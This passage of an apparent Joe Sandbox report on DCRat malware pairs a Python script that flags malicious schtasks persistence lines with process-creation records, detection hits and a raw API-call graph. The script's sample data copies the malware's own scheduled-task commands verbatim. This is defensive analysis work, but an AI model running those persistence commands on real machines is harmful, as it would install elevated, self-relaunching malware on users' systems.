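The fifteen schtasks.exe invocations above all follow one template: a payload carrying a Windows system-process name (explorer.exe, dllhost.exe, backgroundTaskHost.exe) or a random name, placed outside the system directories, registered once with /sc ONLOGON /rl HIGHEST and once or twice on a /sc MINUTE trigger of 8 to 14 minutes, under a task name that is the binary name with one letter appended, with the path wrapped in nested "'...'" quotes. As an added example that is not part of the Joe Sandbox report and is not DCRat or vendor code, the Python script below parses such command lines and tags each of those traits so the pattern can be scored from process-creation logs. The system-name and root-directory lists, the 15-minute threshold and the final benign control line are assumptions for illustration; the other six sample lines are copied from the entries above.

```python
"""Triage schtasks.exe /create command lines for the persistence pattern in
the process list above: a payload named after a Windows system process,
dropped outside the system directories, scheduled ONLOGON with /rl HIGHEST
and again on a short MINUTE trigger, under a task name that is the binary
name with one letter appended.  Added example for this page; not Joe
Sandbox, DCRat or vendor code.  Name lists and thresholds are assumptions."""
import re
from pathlib import PureWindowsPath

# Genuine Windows binary names that malware borrows (illustrative, not exhaustive).
SYSTEM_NAMES = {"explorer.exe", "dllhost.exe", "backgroundtaskhost.exe", "ctfmon.exe",
                "svchost.exe", "conhost.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
                "taskhostw.exe", "runtimebroker.exe", "smss.exe", "wininit.exe"}
# Where those names legitimately live (lower-case, no trailing backslash).
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
# Top-level directories normally present on a system drive.
KNOWN_ROOT_DIRS = {"windows", "users", "program files", "program files (x86)",
                   "programdata", "perflogs"}
MINUTE_THRESHOLD = 15      # /sc MINUTE with /mo at or below this is a relaunch watchdog
_TOKEN = re.compile(r'"[^"]*"|\S+')   # one double-quoted span or one bare word


def _unquote(tok):
    """Peel nested quote layers; this loader wraps paths as "'C:\\...'"."""
    while len(tok) >= 2 and tok[0] == tok[-1] and tok[0] in "\"'":
        tok = tok[1:-1]
    return tok


def parse_schtasks(cmdline):
    """Map each /switch to its value (True for bare switches such as /create, /f)."""
    toks = _TOKEN.findall(cmdline)
    opts, i = {}, 1                          # toks[0] is the program name
    while i < len(toks):
        if toks[i].startswith("/"):
            key = toks[i][1:].lower()
            if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
                opts[key] = _unquote(toks[i + 1])
                i += 1
            else:
                opts[key] = True
        i += 1
    return opts


def analyse(cmdline):
    """Return finding tags for one schtasks /create line; [] means nothing suspicious."""
    opts = parse_schtasks(cmdline)
    if "create" not in opts or not isinstance(opts.get("tr"), str):
        return []
    m = re.match(r"(?i)(.+?\.exe)\b", opts["tr"])      # /tr may carry arguments
    target = PureWindowsPath(m.group(1) if m else opts["tr"])
    name, stem = target.name.lower(), target.stem.lower()
    parent = str(target.parent).lower().rstrip("\\")
    task = str(opts.get("tn", "")).lower()
    mo = str(opts.get("mo", "1"))
    findings = []
    if name in SYSTEM_NAMES and parent not in SYSTEM_DIRS:
        findings.append("system_name_outside_system_dir")
    if task and (task == stem or (len(task) == len(stem) + 1 and task[:-1] == stem)):
        findings.append("task_name_mimics_binary")
    if str(opts.get("sc", "")).upper() == "MINUTE" and mo.isdigit() and int(mo) <= MINUTE_THRESHOLD:
        findings.append("high_frequency_minute_trigger")
    if str(opts.get("rl", "")).upper() == "HIGHEST":
        findings.append("runlevel_highest")
    parts = target.parts
    if len(parts) >= 3 and parts[0].endswith("\\") and parts[1].lower() not in KNOWN_ROOT_DIRS:
        findings.append("nonstandard_root_directory")
    if re.search(r"""/tr\s+"'""", cmdline):
        findings.append("nested_quote_wrapped_target")
    return findings


def triage(cmdlines):
    """(task name, target, findings) for every line that raised at least one finding."""
    out = []
    for cmd in cmdlines:
        findings = analyse(cmd)
        if findings:
            opts = parse_schtasks(cmd)
            out.append((opts.get("tn"), opts.get("tr"), findings))
    return out


# First six lines copied from the process list above; the last is a constructed benign control.
SAMPLE = [
    r'''schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /f''',
    r'''schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f''',
    r'''schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /f''',
    r'''schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 12 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /f''',
    r'''schtasks.exe /create /tn "ChainPortsurrogate" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Acme\backup.exe" /f''',
]

if __name__ == "__main__":
    for task, target, findings in triage(SAMPLE):
        print(f"{task}: {target}\n    {', '.join(findings)}")
```

Run stand-alone it prints the six flagged tasks and stays silent on the control line. The same `analyse` function works on schtasks command lines pulled from Sysmon Event ID 1 or Security 4688 records; a single tag such as `runlevel_highest` is common in legitimate administration, so alert on two or more tags together, as every line in this report produces.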

                                                          Target ID:29
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                                          Imagebase:0x4a0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Users\Default\Documents\dllhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\Default User\Documents\dllhost.exe"
                                                          Imagebase:0xa20000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\Documents\dllhost.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Users\Default\Documents\dllhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\Default User\Documents\dllhost.exe"
                                                          Imagebase:0x820000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                                          Imagebase:0x690000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                                          Imagebase:0xee0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Program Files (x86)\jDownloader\config\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                                          Imagebase:0xa50000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\jDownloader\config\explorer.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          Has exited:true

                                                          Target ID:35
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat"
                                                          Imagebase:0x7ff6490e0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Program Files (x86)\jDownloader\config\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\jdownloader\config\explorer.exe"
                                                          Imagebase:0xa40000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:37
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:07:26:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff6314e0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:07:26:12
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff730240000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:07:26:13
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Imagebase:0x8d0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:41
                                                          Start time:07:26:14
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Imagebase:0x8b0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:43
                                                          Start time:07:26:17
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"
                                                          Imagebase:0xae0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:45
                                                          Start time:07:26:22
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:49
                                                          Start time:07:26:33
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:54
                                                          Start time:07:26:40
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:59
                                                          Start time:07:26:44
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:89
                                                          Start time:07:27:21
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\Conhost.exe
                                                          Wow64 process (32bit):
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:
                                                          Has administrator privileges:
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false


                                                            Execution Graph

                                                            Execution Coverage:9.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:9.3%
                                                            Total number of Nodes:1517
                                                            Total number of Limit Nodes:44
77 API calls 24031->24064 24034 d95be 24033->24034 24039 d95cf 24033->24039 24035 d95ca 24034->24035 24036 d95d1 24034->24036 24034->24039 24065 d974e 24035->24065 24070 d9620 24036->24070 24039->23997 24041 d9bdc 24040->24041 24043 d9be3 24040->24043 24041->23974 24043->24041 24044 d9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24043->24044 24085 d6d1a 77 API calls 24043->24085 24044->24043 24045->23974 24046->23971 24047->23994 24048->23994 24049->23994 24050->23994 24051->23994 24052->23994 24053->23981 24054->23985 24055->23982 24057 dbb10 _wcslen 24056->24057 24058 dbbb8 GetCurrentDirectoryW 24057->24058 24059 dbb39 _wcslen 24057->24059 24058->24059 24059->24004 24060->24015 24061->24019 24062->24023 24063->24025 24064->24027 24066 d9757 24065->24066 24067 d9781 24065->24067 24066->24067 24076 da1e0 24066->24076 24067->24039 24072 d964a 24070->24072 24073 d962c 24070->24073 24071 d9669 24071->24039 24072->24071 24084 d6bd5 76 API calls 24072->24084 24073->24072 24074 d9638 CloseHandle 24073->24074 24074->24072 24077 eec50 24076->24077 24078 da1ed DeleteFileW 24077->24078 24079 d977f 24078->24079 24080 da200 24078->24080 24079->24039 24081 dbb03 GetCurrentDirectoryW 24080->24081 24082 da214 24081->24082 24082->24079 24083 da218 DeleteFileW 24082->24083 24083->24079 24084->24071 24085->24043 24087 eeb3d ___std_exception_copy 24086->24087 24088 e90d6 24087->24088 24091 eeb59 24087->24091 24095 f7a5e 7 API calls 2 library calls 24087->24095 24088->23542 24090 ef5c9 24097 f238d RaiseException 24090->24097 24091->24090 24096 f238d RaiseException 24091->24096 24094 ef5e6 24095->24087 24096->24090 24097->24094 24099 f7ce1 _unexpected 24098->24099 24100 f7cfa 24099->24100 24101 f7ce8 24099->24101 24122 fac31 EnterCriticalSection 24100->24122 24134 f7e2f GetModuleHandleW 24101->24134 24104 f7ced 24104->24100 24135 f7e73 GetModuleHandleExW 24104->24135 24105 f7d9f 24123 f7ddf 24105->24123 24109 f7d76 24113 f7d8e 24109->24113 24117 f8a91 _abort 5 API 
calls 24109->24117 24111 f7dbc 24126 f7dee 24111->24126 24112 f7de8 24144 102390 5 API calls _ValidateLocalCookies 24112->24144 24118 f8a91 _abort 5 API calls 24113->24118 24117->24113 24118->24105 24119 f7d01 24119->24105 24119->24109 24143 f87e0 20 API calls _abort 24119->24143 24122->24119 24145 fac81 LeaveCriticalSection 24123->24145 24125 f7db8 24125->24111 24125->24112 24146 fb076 24126->24146 24129 f7e1c 24132 f7e73 _abort 8 API calls 24129->24132 24130 f7dfc GetPEB 24130->24129 24131 f7e0c GetCurrentProcess TerminateProcess 24130->24131 24131->24129 24133 f7e24 ExitProcess 24132->24133 24134->24104 24136 f7e9d GetProcAddress 24135->24136 24137 f7ec0 24135->24137 24140 f7eb2 24136->24140 24138 f7ecf 24137->24138 24139 f7ec6 FreeLibrary 24137->24139 24141 efbbc _ValidateLocalCookies 5 API calls 24138->24141 24139->24138 24140->24137 24142 f7cf9 24141->24142 24142->24100 24143->24109 24145->24125 24147 fb09b 24146->24147 24148 fb091 24146->24148 24149 fac98 __dosmaperr 5 API calls 24147->24149 24150 efbbc _ValidateLocalCookies 5 API calls 24148->24150 24149->24148 24151 f7df8 24150->24151 24151->24129 24151->24130 25437 eb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24152 ee5b1 24153 ee578 24152->24153 24155 ee85d 24153->24155 24181 ee5bb 24155->24181 24157 ee86d 24158 ee8ca 24157->24158 24161 ee8ee 24157->24161 24159 ee7fb DloadReleaseSectionWriteAccess 6 API calls 24158->24159 24160 ee8d5 RaiseException 24159->24160 24175 eeac3 24160->24175 24162 ee966 LoadLibraryExA 24161->24162 24163 eea95 24161->24163 24165 ee9c7 24161->24165 24167 ee9d9 24161->24167 24164 ee979 GetLastError 24162->24164 24162->24165 24190 ee7fb 24163->24190 24169 ee9a2 24164->24169 24178 ee98c 24164->24178 24165->24167 24168 ee9d2 FreeLibrary 24165->24168 24166 eea37 GetProcAddress 24166->24163 24171 eea47 GetLastError 24166->24171 24167->24163 24167->24166 24168->24167 24170 ee7fb DloadReleaseSectionWriteAccess 6 API calls 24169->24170 24172 ee9ad RaiseException 24170->24172 
24173 eea5a 24171->24173 24172->24175 24173->24163 24176 ee7fb DloadReleaseSectionWriteAccess 6 API calls 24173->24176 24175->24153 24177 eea7b RaiseException 24176->24177 24179 ee5bb ___delayLoadHelper2@8 6 API calls 24177->24179 24178->24165 24178->24169 24180 eea92 24179->24180 24180->24163 24182 ee5ed 24181->24182 24183 ee5c7 24181->24183 24182->24157 24198 ee664 24183->24198 24185 ee5cc 24186 ee5e8 24185->24186 24201 ee78d 24185->24201 24206 ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24186->24206 24189 ee836 24189->24157 24191 ee82f 24190->24191 24192 ee80d 24190->24192 24191->24175 24193 ee664 DloadReleaseSectionWriteAccess 3 API calls 24192->24193 24195 ee812 24193->24195 24194 ee82a 24209 ee831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24194->24209 24195->24194 24196 ee78d DloadProtectSection 3 API calls 24195->24196 24196->24194 24207 ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24198->24207 24200 ee669 24200->24185 24203 ee7a2 DloadProtectSection 24201->24203 24202 ee7a8 24202->24186 24203->24202 24204 ee7dd VirtualProtect 24203->24204 24208 ee6a3 VirtualQuery GetSystemInfo 24203->24208 24204->24202 24206->24189 24207->24200 24208->24204 24209->24191 25477 102bd0 VariantClear 25455 e62ca 123 API calls __InternalCxxFrameHandler 24350 edec2 24351 edecf 24350->24351 24352 de617 53 API calls 24351->24352 24353 ededc 24352->24353 24354 d4092 _swprintf 51 API calls 24353->24354 24355 edef1 SetDlgItemTextW 24354->24355 24358 eb568 PeekMessageW 24355->24358 24359 eb5bc 24358->24359 24360 eb583 GetMessageW 24358->24360 24361 eb5a8 TranslateMessage DispatchMessageW 24360->24361 24362 eb599 IsDialogMessageW 24360->24362 24361->24359 24362->24359 24362->24361 25439 eb5c0 100 API calls 25479 e77c0 118 API calls 25480 effc0 RaiseException _com_raise_error _com_error::_com_error 25456 f0ada 51 API calls 2 library calls 24458 d10d5 24463 d5abd 24458->24463 24464 d5ac7 __EH_prolog 24463->24464 24470 db505 24464->24470 
24466 d5ad3 24476 d5cac GetCurrentProcess GetProcessAffinityMask 24466->24476 24471 db50f __EH_prolog 24470->24471 24477 df1d0 82 API calls 24471->24477 24473 db521 24478 db61e 24473->24478 24477->24473 24479 db630 __cftof 24478->24479 24482 e10dc 24479->24482 24485 e109e GetCurrentProcess GetProcessAffinityMask 24482->24485 24486 db597 24485->24486 24486->24466 24487 ee2d7 24489 ee1db 24487->24489 24488 ee85d ___delayLoadHelper2@8 14 API calls 24488->24489 24489->24488 25414 ef4d3 20 API calls 24493 ee1d1 14 API calls ___delayLoadHelper2@8 25481 fa3d0 21 API calls 2 library calls 25441 df1e8 FreeLibrary 24500 eeae7 24501 eeaf1 24500->24501 24502 ee85d ___delayLoadHelper2@8 14 API calls 24501->24502 24503 eeafe 24502->24503 25415 ef4e7 29 API calls _abort 24505 d13e1 84 API calls 2 library calls 24506 eb7e0 24507 eb7ea __EH_prolog 24506->24507 24674 d1316 24507->24674 24510 ebf0f 24739 ed69e 24510->24739 24511 eb82a 24513 eb89b 24511->24513 24514 eb838 24511->24514 24590 eb841 24511->24590 24520 eb92e GetDlgItemTextW 24513->24520 24521 eb8b1 24513->24521 24516 eb83c 24514->24516 24517 eb878 24514->24517 24526 de617 53 API calls 24516->24526 24516->24590 24528 eb95f KiUserCallbackDispatcher 24517->24528 24517->24590 24518 ebf2a SendMessageW 24519 ebf38 24518->24519 24522 ebf52 GetDlgItem SendMessageW 24519->24522 24523 ebf41 SendDlgItemMessageW 24519->24523 24520->24517 24524 eb96b 24520->24524 24525 de617 53 API calls 24521->24525 24757 ea64d GetCurrentDirectoryW 24522->24757 24523->24522 24529 eb980 GetDlgItem 24524->24529 24672 eb974 24524->24672 24532 eb8ce SetDlgItemTextW 24525->24532 24533 eb85b 24526->24533 24528->24590 24530 eb9b7 SetFocus 24529->24530 24531 eb994 SendMessageW SendMessageW 24529->24531 24535 eb9c7 24530->24535 24549 eb9e0 24530->24549 24531->24530 24536 eb8d9 24532->24536 24779 d124f SHGetMalloc 24533->24779 24534 ebf82 GetDlgItem 24538 ebf9f 24534->24538 24539 ebfa5 SetWindowTextW 24534->24539 24540 de617 53 API calls 24535->24540 24543 
eb8e6 GetMessageW 24536->24543 24536->24590 24538->24539 24758 eabab GetClassNameW 24539->24758 24544 eb9d1 24540->24544 24541 ebe55 24545 de617 53 API calls 24541->24545 24547 eb8fd IsDialogMessageW 24543->24547 24543->24590 24780 ed4d4 24544->24780 24551 ebe65 SetDlgItemTextW 24545->24551 24547->24536 24554 eb90c TranslateMessage DispatchMessageW 24547->24554 24556 de617 53 API calls 24549->24556 24550 ec1fc SetDlgItemTextW 24550->24590 24555 ebe79 24551->24555 24554->24536 24557 de617 53 API calls 24555->24557 24559 eba17 24556->24559 24594 ebe9c _wcslen 24557->24594 24558 ebff0 24562 ec020 24558->24562 24566 de617 53 API calls 24558->24566 24564 d4092 _swprintf 51 API calls 24559->24564 24560 ec73f 97 API calls 24560->24558 24561 eb9d9 24684 da0b1 24561->24684 24573 ec73f 97 API calls 24562->24573 24618 ec0d8 24562->24618 24565 eba29 24564->24565 24568 ed4d4 16 API calls 24565->24568 24570 ec003 SetDlgItemTextW 24566->24570 24568->24561 24569 ec18b 24574 ec19d 24569->24574 24575 ec194 EnableWindow 24569->24575 24577 de617 53 API calls 24570->24577 24571 eba73 24690 eac04 SetCurrentDirectoryW 24571->24690 24572 eba68 GetLastError 24572->24571 24579 ec03b 24573->24579 24580 ec1ba 24574->24580 24798 d12d3 GetDlgItem EnableWindow 24574->24798 24575->24574 24576 ebeed 24583 de617 53 API calls 24576->24583 24581 ec017 SetDlgItemTextW 24577->24581 24584 ec04d 24579->24584 24615 ec072 24579->24615 24587 ec1e1 24580->24587 24598 ec1d9 SendMessageW 24580->24598 24581->24562 24582 eba87 24588 eba90 GetLastError 24582->24588 24589 eba9e 24582->24589 24583->24590 24796 e9ed5 32 API calls 24584->24796 24585 ec0cb 24595 ec73f 97 API calls 24585->24595 24587->24590 24599 de617 53 API calls 24587->24599 24588->24589 24592 ebb11 24589->24592 24600 ebaae GetTickCount 24589->24600 24601 ebb20 24589->24601 24592->24601 24603 ebd56 24592->24603 24593 ec1b0 24799 d12d3 GetDlgItem EnableWindow 24593->24799 24594->24576 24602 de617 53 API calls 24594->24602 24595->24618 24596 ec066 
24596->24615 24598->24587 24609 eb862 24599->24609 24610 d4092 _swprintf 51 API calls 24600->24610 24605 ebcfb 24601->24605 24606 ebb39 GetModuleFileNameW 24601->24606 24607 ebcf1 24601->24607 24611 ebed0 24602->24611 24699 d12f1 GetDlgItem ShowWindow 24603->24699 24604 ec169 24797 e9ed5 32 API calls 24604->24797 24614 de617 53 API calls 24605->24614 24790 df28c 82 API calls 24606->24790 24607->24517 24607->24605 24609->24550 24609->24590 24617 ebac7 24610->24617 24619 d4092 _swprintf 51 API calls 24611->24619 24622 ebd05 24614->24622 24615->24585 24623 ec73f 97 API calls 24615->24623 24616 ebd66 24700 d12f1 GetDlgItem ShowWindow 24616->24700 24691 d966e 24617->24691 24618->24569 24618->24604 24625 de617 53 API calls 24618->24625 24619->24576 24620 ec188 24620->24569 24621 ebb5f 24626 d4092 _swprintf 51 API calls 24621->24626 24627 d4092 _swprintf 51 API calls 24622->24627 24628 ec0a0 24623->24628 24625->24618 24630 ebb81 CreateFileMappingW 24626->24630 24631 ebd23 24627->24631 24628->24585 24632 ec0a9 DialogBoxParamW 24628->24632 24629 ebd70 24633 de617 53 API calls 24629->24633 24635 ebbe3 GetCommandLineW 24630->24635 24667 ebc60 __InternalCxxFrameHandler 24630->24667 24644 de617 53 API calls 24631->24644 24632->24517 24632->24585 24636 ebd7a SetDlgItemTextW 24633->24636 24638 ebbf4 24635->24638 24701 d12f1 GetDlgItem ShowWindow 24636->24701 24637 ebaed 24641 ebaf4 GetLastError 24637->24641 24642 ebaff 24637->24642 24791 eb425 SHGetMalloc 24638->24791 24639 ebc6b ShellExecuteExW 24664 ebc88 24639->24664 24641->24642 24646 d959a 80 API calls 24642->24646 24648 ebd3d 24644->24648 24645 ebd8c SetDlgItemTextW GetDlgItem 24649 ebda9 GetWindowLongW SetWindowLongW 24645->24649 24650 ebdc1 24645->24650 24646->24592 24647 ebc10 24792 eb425 SHGetMalloc 24647->24792 24649->24650 24702 ec73f 24650->24702 24653 ebc1c 24793 eb425 SHGetMalloc 24653->24793 24656 ebccb 24656->24607 24660 ebce1 UnmapViewOfFile CloseHandle 24656->24660 24657 ec73f 97 API calls 24659 ebddd 
